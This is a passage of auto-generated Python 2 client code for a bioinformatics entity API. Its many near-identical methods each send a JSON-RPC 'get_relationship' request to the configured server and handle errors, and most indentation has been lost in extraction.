            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsesAliasForCompound(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsesAliasForCompound',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasEffector(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasEffector',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsEffectorFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsEffectorFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasExperimentalUnit(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasExperimentalUnit',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsExperimentalUnitOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsExperimentalUnitOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasExpressionSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasExpressionSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleBelongsToExperimentalUnit(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleBelongsToExperimentalUnit',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasGenomes(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasGenomes',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInRegulogCollection(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInRegulogCollection',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasIndicatedSignalFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasIndicatedSignalFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IndicatesSignalFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IndicatesSignalFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasKnockoutIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasKnockoutIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_KnockedOutIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_KnockedOutIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasMeasurement(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasMeasurement',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsMeasureOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsMeasureOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasMember(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasMember',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsMemberOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsMemberOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasParameter(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasParameter',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OfEnvironment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OfEnvironment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasParticipant(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasParticipant',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ParticipatesIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ParticipatesIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasPresenceOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasPresenceOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsPresentIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsPresentIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasProteinMember(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasProteinMember',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsProteinMemberOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsProteinMemberOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasReactionAliasFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasReactionAliasFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsesAliasForReaction(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsesAliasForReaction',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRegulogs(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRegulogs',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInCollection(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInCollection',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRepresentativeOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRepresentativeOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRepresentedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRepresentedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRequirementOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRequirementOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsARequirementOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsARequirementOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
